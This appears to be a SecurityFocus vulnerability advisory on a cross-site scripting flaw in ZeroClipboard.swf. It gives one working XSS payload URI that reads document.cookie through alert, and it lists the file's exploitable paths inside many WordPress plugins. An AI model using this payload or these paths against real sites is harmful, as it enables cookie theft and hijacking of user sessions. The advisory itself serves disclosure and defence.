ZeroClipboard 'ZeroClipboard10.swf' Cross Site Scripting Vulnerability

Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/wp-content/plugins/bp-code-snippets/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/buckets/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/click-to-copy-grab-box/lib/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/geshi-source-colorer/external/zeroclipboard/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/jaspreetchahals-coupons-lite/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/mobileview/admin/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/paypal-digital-goods-monetization-powered-by-cleeng/js/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/wp-clone-by-wp-academy/lib/js/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/thethe-layout-grid/style/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/zopim-live-chat/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/wp-link-to-us/js/ZeroClipboard.swf?id=[xss]


 

Privacy Statement
Copyright 2010, SecurityFocus